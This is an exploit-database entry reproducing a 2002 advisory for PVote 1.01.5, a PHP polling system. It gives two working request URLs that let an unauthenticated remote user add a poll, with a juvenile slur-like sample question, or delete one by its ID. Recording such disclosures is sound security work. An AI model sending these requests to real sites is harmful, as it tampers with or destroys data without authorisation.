PVote 1.01.5 - Poll Content Manipulation

2002-04-18T00:00:00
ID EXPLOITPACK:D524D9DB18DA5FA425AB799E71B3F980
Type exploitpack
Reporter Daniel Nyström
Modified 2002-04-18T00:00:00

Description

PVote 1.01.5 - Poll Content Manipulation

                                        
                                            source: https://www.securityfocus.com/bid/4540/info

PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.

It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters. 

ADD A POLL:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad

where question refers to the topic of the topic to be added by the attack.

DELETE A POLL:

http://target/pvote/del.php?pollorder=1

where pollorder is the poll 'id' number for the poll to be deleted.